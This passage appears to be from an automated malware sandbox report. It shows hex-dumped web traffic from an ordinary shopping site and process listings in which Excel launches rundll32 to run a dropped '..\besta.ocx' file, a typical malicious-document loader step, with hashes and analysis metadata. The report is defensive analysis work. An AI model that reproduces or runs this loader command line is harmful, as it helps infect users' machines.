                                                                                                                            2021-12-02 10:35:27 UTC147INData Raw: 33 62 34 35 0d 0a 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 38 35 62 39 38 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 22 20 64 61 74 61 2d 69 64 3d 22 63 38 35 62 39 38 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 73 70 61 63 65 72 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63
                                                                                                                            Data Ascii: 3b45ated"><div class="elementor-element elementor-element-c85b98e elementor-widget elementor-widget-spacer" data-id="c85b98e" data-element_type="widget" data-widget_type="spacer.default"><div class="elementor-widget-container"><div c
                                                                                                                            2021-12-02 10:35:27 UTC155INData Raw: 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 2d 31 30 30 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 63 6f 6c 75 6d 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 69 64 3d 22 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 62 38
                                                                                                                            Data Ascii: elementor-col-100 elementor-top-column elementor-element elementor-element-c66e72c" data-id="c66e72c" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-b8
                                                                                                                            2021-12-02 10:35:27 UTC162INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2021-12-02 10:35:27 UTC162INData Raw: 32 61 38 32 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 32 31 35 37 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 32 31 35 37 20 65 6c 65 6d 65 6e 74 6f 72 2d 6c 6f 63 61 74 69 6f 6e 2d 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 74 74 69 6e 67 73 3d 22 5b 5d 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 77 72 61 70 22 3e 0a 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e
                                                                                                                            Data Ascii: 2a82<div data-elementor-type="footer" data-elementor-id="2157" class="elementor elementor-2157 elementor-location-footer" data-elementor-settings="[]"><div class="elementor-section-wrap"><section class="elementor-section elementor-top-section
                                                                                                                            2021-12-02 10:35:27 UTC170INData Raw: 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 34 37 30 62 32 30 34 31 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 6d 65 6e 75 2d 61 6e 63 68 6f 72 22 20 64 61 74 61 2d 69 64 3d 22 34 37 30 62 32 30 34 31 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61
                                                                                                                            Data Ascii: data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-470b2041 elementor-widget elementor-widget-menu-anchor" data-id="470b2041" data-element_type="widget" da
                                                                                                                            2021-12-02 10:35:27 UTC172INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2021-12-02 10:35:27 UTC172INData Raw: 31 64 38 33 0d 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 68 74 6d 6f 76 65 2d 71 75 69 63 6b 2d 76 69 65 77 2d 6d 6f 64 61 6c 22 20 69 64 3d 22 68 74 6d 6f 76 65 71 75 69 63 6b 2d 76 69 65 77 6d 6f 64 61 6c 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 20 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 20 70 72 6f 64 75 63 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6c 6f
                                                                                                                            Data Ascii: 1d83<div class="woocommerce htmove-quick-view-modal" id="htmovequick-viewmodal" style="visibility: hidden;opacity: 0;display:none;"><div class="htmove-modal-dialog product"><div class="htmove-modal-content"><button type="button" class="htmove-modal-clo


                                                                                                                            Code Manipulations

                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            Analysis Process: EXCEL.EXE PID: 7136 Parent PID: 744

                                                                                                                            General

                                                                                                                            Start time:11:35:15
                                                                                                                            Start date:02/12/2021
                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                            Imagebase:0xce0000
                                                                                                                            File size:27110184 bytes
                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Chronological Activities

                                                                                                                            Analysis Process: rundll32.exe PID: 6680 Parent PID: 7136

                                                                                                                            General

                                                                                                                            Start time:11:35:28
                                                                                                                            Start date:02/12/2021
                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935
                                                                                                                            Imagebase:0x1100000
                                                                                                                            File size:61952 bytes
                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Chronological Activities

                                                                                                                            Analysis Process: BackgroundTransferHost.exe PID: 6680 Parent PID: 744

                                                                                                                            General

                                                                                                                            Start time:11:36:15
                                                                                                                            Start date:02/12/2021
                                                                                                                            Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                            Imagebase:0x7ff62a980000
                                                                                                                            File size:36864 bytes
                                                                                                                            MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate

                                                                                                                            Chronological Activities

                                                                                                                            Disassembly

                                                                                                                            Code Analysis

                                                                                                                            Reset < >

                                                                                                                              Analysis Process: EXCEL.EXE PID: 7136 Parent PID: 744 EXCEL.EXECOMMON

                                                                                                                              Executed Functions

                                                                                                                              Non-executed Functions

                                                                                                                              Function 0F63B7C4, Relevance: .1, Instructions: 136COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000003.420451635.000000000F62C000.00000004.00000001.sdmp, Offset: 0F62C000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_3_f62c000_EXCEL.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cec3372f9babab121481903b18651a986cc9b7a17ce8c0ec5ad59b4d068dc3d
                                                                                                                              • Instruction ID: a56100861d6246226d471037186b118dfcaec643efb34d2f8901d0444d5e7ef3
                                                                                                                              • Opcode Fuzzy Hash: 4cec3372f9babab121481903b18651a986cc9b7a17ce8c0ec5ad59b4d068dc3d
                                                                                                                              • Instruction Fuzzy Hash: 2151AC2694E7C54FD3078BB488257847FB4AF17644F1E82EBC485CF1B3E2694A0AC766
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%